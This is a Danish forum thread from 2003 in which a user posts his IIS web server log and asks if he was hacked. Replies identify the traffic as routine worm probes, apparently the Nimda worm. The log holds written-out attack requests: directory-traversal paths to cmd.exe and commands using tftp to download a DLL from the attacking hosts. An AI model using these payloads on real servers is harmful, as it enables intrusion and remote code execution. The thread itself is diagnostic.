|
| hack? Fra : McBrain |
Dato : 22-02-03 18:43 |
|
er det her en der har hacket min webserver?....min ip er xxxxxxxx?
OPTIONS / - 200 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-02-21 13:34:12 192.168.0.2 - 192.168.0.1 80 PROPFIND /Jonasprøve - 404
Microsoft-WebDAV-MiniRedir/5.1.2600
2003-02-21 14:33:17 80.236.81.176 - xxxxxxxxxx 80 GET /scripts/root.exe
/c+dir 404 -
2003-02-21 14:33:23 80.236.81.176 - xxxxxxxxxx 80 GET /MSADC/root.exe /c+dir
403 -
2003-02-21 14:33:27 80.236.81.176 - xxxxxxxxxx 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 -
2003-02-21 14:33:32 80.236.81.176 - xxxxxxxxxx 80 GET
/d/winnt/system32/cmd.exe /c+dir 404 -
2003-02-21 14:33:39 80.236.81.176 - xxxxxxxxxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2003-02-21 14:34:31 80.236.81.176 - xxxxxxxxxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.236.81.176%20GET%20cool.dll%20c:\httpodbc.dll 502 -
2003-02-21 14:35:24 80.236.81.176 - xxxxxxxxxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.236.81.176%20GET%20cool.dll%20d:\httpodbc.dll 502 -
2003-02-21 14:36:22 80.236.81.176 - xxxxxxxxxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.236.81.176%20GET%20cool.dll%20e:\httpodbc.dll 502 -
2003-02-21 14:36:23 80.236.81.176 - xxxxxxxxxx 80 GET
/scripts/..%5c../httpodbc.dll - 500 -
2003-02-21 14:36:25 80.236.81.176 - xxxxxxxxxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 -
2003-02-21 14:36:35 80.236.81.176 - xxxxxxxxxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.236.81.176%20GET%20cool.dll%20c:\httpodbc.dll 502 -
2003-02-21 14:36:37 80.236.81.176 - xxxxxxxxxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.236.81.176%20GET%20cool.dll%20d:\httpodbc.dll 502 -
2003-02-21 14:36:41 80.236.81.176 - xxxxxxxxxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.236.81.176%20GET%20cool.dll%20e:\httpodbc.dll 502 -
2003-02-21 14:36:41 80.236.81.176 - xxxxxxxxxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../httpodbc.dll - 500 -
2003-02-21 14:36:44 80.236.81.176 - xxxxxxxxxx 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-02-21 14:36:45 80.236.81.176 - xxxxxxxxxx 80 GET
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
/c+dir 403 -
2003-02-21 14:36:47 80.236.81.176 - xxxxxxxxxx 80 GET
/scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
2003-02-21 14:36:48 80.236.81.176 - xxxxxxxxxx 80 GET
/scripts/winnt/system32/cmd.exe /c+dir 404 -
2003-02-21 14:36:50 80.236.81.176 - xxxxxxxxxx 80 GET
/scripts/../../winnt/system32/cmd.exe /c+dir 200 -
2003-02-21 14:36:55 80.236.81.176 - xxxxxxxxxx 80 GET
/scripts/../../winnt/system32/cmd.exe
/c+tftp%20-i%2080.236.81.176%20GET%20cool.dll%20c:\httpodbc.dll 502 -
2003-02-21 18:19:23 80.198.58.140 - xxxxxxxxxx 80 GET /index.htm - 304
Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)
2003-02-21 18:19:23 80.198.58.140 - xxxxxxxxxx 80 GET /ocsc-title.jpg - 304
Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)
2003-02-21 18:20:18 80.198.58.140 - xxxxxxxxxx 80 GET /downloads.htm - 200
Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)
2003-02-21 18:20:18 80.198.58.140 - xxxxxxxxxx 80 GET /downloads.jpg - 304
Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)
2003-02-21 18:20:18 80.198.58.140 - xxxxxxxxxx 80 GET /enter.jpg - 200
Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)
2003-02-21 18:21:24 80.198.58.140 - xxxxxxxxxx 80 GET
/bigk-member-profile.htm - 200
Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)
2003-02-21 18:21:24 80.198.58.140 - xxxxxxxxxx 80 GET /big-k.jpg - 200
Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)
2003-02-21 19:18:51 80.81.70.4 - xxxxxxxxxx 80 GET /scripts/root.exe /c+dir
404 -
2003-02-21 19:18:51 80.81.70.4 - xxxxxxxxxx 80 GET /MSADC/root.exe /c+dir
403 -
2003-02-21 19:18:53 80.81.70.4 - xxxxxxxxxx 80 GET /c/winnt/system32/cmd.exe
/c+dir 404 -
2003-02-21 19:18:53 80.81.70.4 - xxxxxxxxxx 80 GET /d/winnt/system32/cmd.exe
/c+dir 404 -
2003-02-21 19:18:55 80.81.70.4 - xxxxxxxxxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2003-02-21 19:19:44 80.81.70.4 - xxxxxxxxxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.81.70.4%20GET%20cool.dll%20c:\httpodbc.dll 502 -
2003-02-21 19:19:44 80.81.70.4 - xxxxxxxxxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.81.70.4%20GET%20cool.dll%20d:\httpodbc.dll 502 -
2003-02-21 19:19:45 80.81.70.4 - xxxxxxxxxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.81.70.4%20GET%20cool.dll%20e:\httpodbc.dll 502 -
2003-02-21 19:19:45 80.81.70.4 - xxxxxxxxxx 80 GET
/scripts/..%5c../httpodbc.dll - 500 -
2003-02-21 19:19:46 80.81.70.4 - xxxxxxxxxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 -
2003-02-21 19:19:46 80.81.70.4 - xxxxxxxxxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.81.70.4%20GET%20cool.dll%20c:\httpodbc.dll 502 -
2003-02-21 19:19:47 80.81.70.4 - xxxxxxxxxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.81.70.4%20GET%20cool.dll%20d:\httpodbc.dll 502 -
2003-02-21 19:19:47 80.81.70.4 - xxxxxxxxxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.81.70.4%20GET%20cool.dll%20e:\httpodbc.dll 502 -
2003-02-21 19:19:49 80.81.70.4 - xxxxxxxxxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../httpodbc.dll - 500 -
2003-02-21 19:19:49 80.81.70.4 - xxxxxxxxxx 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-02-21 19:19:50 80.81.70.4 - xxxxxxxxxx 80 GET
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
/c+dir 403 -
2003-02-21 19:19:50 80.81.70.4 - xxxxxxxxxx 80 GET
/scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
2003-02-21 19:19:51 80.81.70.4 - xxxxxxxxxx 80 GET
/scripts/winnt/system32/cmd.exe /c+dir 404 -
| |
Steen Suder, privat (23-02-2003)
| Kommentar Fra : Steen Suder, privat |
Dato : 23-02-03 00:19 |
|
McBrain wrote:
> er det her en der har hacket min webserver?....min ip er xxxxxxxx?
<KLIP log>
Nej, det tror jeg ikke. Det ligner bare de alm. angrebsforsøg fra orm og
scriptkiddies. Uden at gå i detaljer med opsætning og analyse, kan jeg
også sige at jeg ser masser af den slags på de fleste webservere.
--
Mvh. / Best regards,
Steen Suder < http://www.suder.dk/>
ICQ UIN 4133803
| |
15kw (23-02-2003)
| Kommentar Fra : 15kw |
Dato : 23-02-03 16:06 |
|
"McBrain" <jojo@yahoo.dk> skrev i
news:3e57b699$0$15854$edfadb0f@dread11.news.tele.dk
> er det her en der har hacket min webserver?....min ip er xxxxxxxx?
>
>
Det ligner NIMDA ormen.
--
Hilsen
Peter N Petersen
http://peteropfinder.dk
| |
|
|